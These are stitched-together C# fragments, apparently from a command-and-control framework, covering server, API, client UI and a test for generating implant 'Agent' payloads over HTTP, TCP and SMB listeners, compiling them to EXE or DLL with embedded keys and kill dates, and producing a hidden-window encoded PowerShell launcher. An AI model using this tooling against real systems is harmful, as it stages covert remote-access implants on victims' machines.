public static string GenerateAgentPayload(PayloadRequest request)
{
var result = default(string);
var listener = GetListener(request.ListenerId);
if (listener == null)
{
return(result);
}
var payload = default(byte[]);
try
{
if (listener.Type == ListenerType.HTTP)
{
var controller = new HttpPayloadController(listener as ListenerHttp);
payload = controller.GenerateHttpPayload(request);
}
else if (listener.Type == ListenerType.TCP)
{
var controller = new TcpPayloadController(listener as ListenerTcp);
payload = controller.GenerateTcpPayload(request);
}
}
catch
{
return(result);
}
return(Convert.ToBase64String(payload));
}
public byte[] GenerateTcpPayload(PayloadRequest request)
{
TempPath = CreateTempDirectory();
var compilerRequest = new Compiler.CompilationRequest
{
AssemblyName = "Agent",
OutputKind = (OutputKind)request.OutputType,
Platform = Platform.AnyCpu,
ReferenceDirectory = request.TargetFramework == TargetFramework.Net35 ? ReferencesDirectory + Path.DirectorySeparatorChar + "net35" : ReferencesDirectory + Path.DirectorySeparatorChar + "net40",
TargetDotNetVersion = (Compiler.DotNetVersion)request.TargetFramework,
SourceDirectory = TempPath,
References = new List <Compiler.Reference>
{
new Compiler.Reference
{
File = "mscorlib.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.Core.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.XML.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
},
new Compiler.Reference
{
File = "System.Runtime.Serialization.dll",
Framework = (Compiler.DotNetVersion)request.TargetFramework,
Enabled = true
}
}
};
CloneAgentSourceCode(Listener.Type, TempPath);
InsertBindAddress();
InsertBindPort();
InsertKillDate(request.KillDate);
InsertCryptoKey(Convert.ToBase64String(Program.ServerController.CryptoController.EncryptionKey));
var result = Compiler.Compile(compilerRequest);
RemoveTempDirectory(TempPath);
return(result);
}
private async void OnGeneratePayload(object obj)
{
var payloadReq = new PayloadRequest
{
ListenerId = SelectedListener.Split(":")[0].TrimEnd(),
OutputType = OutputType.Dll,
SleepInterval = SleepInterval,
SleepJitter = SleepJitter,
KillDate = KillDate,
TargetFramework = TargetFramework.Net40
};
if (SelectedFormat == Formats[0])
{
payloadReq.OutputType = OutputType.Exe;
}
var window = new Window
{
Height = 100,
Width = 360,
WindowStartupLocation = WindowStartupLocation.CenterOwner,
Content = new ProgressBarView {
DataContext = new ProgressBarViewModel {
Label = "Building..."
}
}
};
window.Show();
var payload = await PayloadAPI.GenerateAgentPayload(payloadReq);
window.Close();
if (payload.Length > 0)
{
var save = new SaveFileDialog();
if (SelectedFormat == Formats[0])
{
save.Filter = "EXE (*.exe)|*.exe";
}
else if (SelectedFormat == Formats[1])
{
save.Filter = "DLL (*.dll)|*.dll";
}
if ((bool)save.ShowDialog())
{
File.WriteAllBytes(save.FileName, payload);
}
}
View.Close();
}
public IActionResult GeneratePayload([FromBody] PayloadRequest request)
{
var user = HttpContext.User.Identity.Name;
var payload = Controllers.PayloadControllerBase.GenerateAgentPayload(request);
if (!string.IsNullOrEmpty(payload))
{
return(Ok(payload));
}
else
{
return(BadRequest());
}
}
public static async Task <byte[]> GenerateAgentPayload(PayloadRequest payloadReq)
{
var apiRequest = new RestRequest("/api/Payload", Method.POST);
apiRequest.AddParameter("application/json", JsonConvert.SerializeObject(payloadReq), ParameterType.RequestBody);
var apiResponse = await REST.Client.ExecuteAsync(apiRequest);
if (apiResponse.StatusCode == System.Net.HttpStatusCode.OK)
{
return(Convert.FromBase64String(apiResponse.Content.Replace("\"", "")));
}
else
{
return(new byte[] { });
}
}
public async Task <ActionResult> PostPayload([FromBody] PayloadRequest request)
{
if (!_authService.IsAuthenticate(Payload.GroupId))
{
return(Unauthorized());
}
var form = _mapper.Map <Payload>(request);
var apiType = Utility.GetTypeFromUrl(Request.Path.Value);
if (apiType == LogType.Empty)
{
return(NotFound());
}
return(await Post <Payload>(form, apiType));
}
public async void GenerateHttpAgentPayloadFail()
{
await TestClient.ClientLogin(TeamServer.Helpers.GeneratePseudoRandomString(6), "a");
var payloadRequest = new PayloadRequest
{
ListenerId = "blah",
OutputType = OutputType.Exe,
TargetFramework = TargetFramework.Net40
};
var apiReq = await TestClient.HttpClient.PostAsync("api/Payload", Helpers.Serialise(payloadRequest));
var result = Helpers.Deserialise <PayloadResponse>(apiReq.Content.ReadAsStringAsync());
Assert.Equal(CompilerStatus.Fail, result.CompilerStatus);
Assert.Null(result.EncodedAssembly);
Assert.NotNull(result.ErrorMessage);
}
private async void OnGeneratePayload(object obj)
{
var listener = Listeners.FirstOrDefault(l => l.ListenerName.Equals(SelectedListener.Split(":")[0].TrimEnd(), StringComparison.OrdinalIgnoreCase));
var req = new PayloadRequest();
switch (listener.ListenerType)
{
case ListenerType.HTTP:
req = new HttpPayloadRequest {
ListenerGuid = listener.ListenerGuid, SleepInterval = SleepInterval, SleepJitter = SleepJitter
};
break;
case ListenerType.TCP:
req = new TcpPayloadRequest {
ListenerGuid = listener.ListenerGuid
};
break;
case ListenerType.SMB:
req = new SmbPayloadRequest {
ListenerGuid = listener.ListenerGuid
};
break;
}
req.KillDate = KillDate;
if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase) || SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase))
{
req.OutputType = OutputType.Exe;
}
var window = new Window
{
Height = 100,
Width = 360,
WindowStartupLocation = WindowStartupLocation.CenterOwner,
Content = new ProgressBarView {
DataContext = new ProgressBarViewModel {
Label = "Building..."
}
}
};
window.Show();
var payload = new byte[] { };
switch (listener.ListenerType)
{
case ListenerType.HTTP:
payload = await PayloadAPI.GenerateHttpStager(req as HttpPayloadRequest);
break;
case ListenerType.TCP:
payload = await PayloadAPI.GenerateTcpStager(req as TcpPayloadRequest);
break;
case ListenerType.SMB:
payload = await PayloadAPI.GenerateSmbStager(req as SmbPayloadRequest);
break;
}
window.Close();
if (payload.Length > 0)
{
if (SelectedFormat.Equals("PowerShell", StringComparison.OrdinalIgnoreCase))
{
var launcher = PowerShellLauncher.GenerateLauncher(payload);
var encLauncher = Convert.ToBase64String(Encoding.Unicode.GetBytes(launcher));
var powerShellPayloadViewModel = new PowerShellPayloadViewModel
{
Launcher = $"powershell.exe -nop -w hidden -c \"{launcher}\"",
EncLauncher = $@"powershell.exe -nop -w hidden -enc {encLauncher}",
};
var powerShellPayloadView = new PowerShellPayloadView
{
DataContext = powerShellPayloadViewModel
};
powerShellPayloadView.Show();
}
else
{
var save = new SaveFileDialog();
if (SelectedFormat.Contains("EXE", StringComparison.OrdinalIgnoreCase))
{
save.Filter = "EXE (*.exe)|*.exe";
}
else if (SelectedFormat.Contains("DLL", StringComparison.OrdinalIgnoreCase))
{
save.Filter = "DLL (*.dll)|*.dll";
}
if ((bool)save.ShowDialog())
{
File.WriteAllBytes(save.FileName, payload);
}
}
}
View.Close();
}
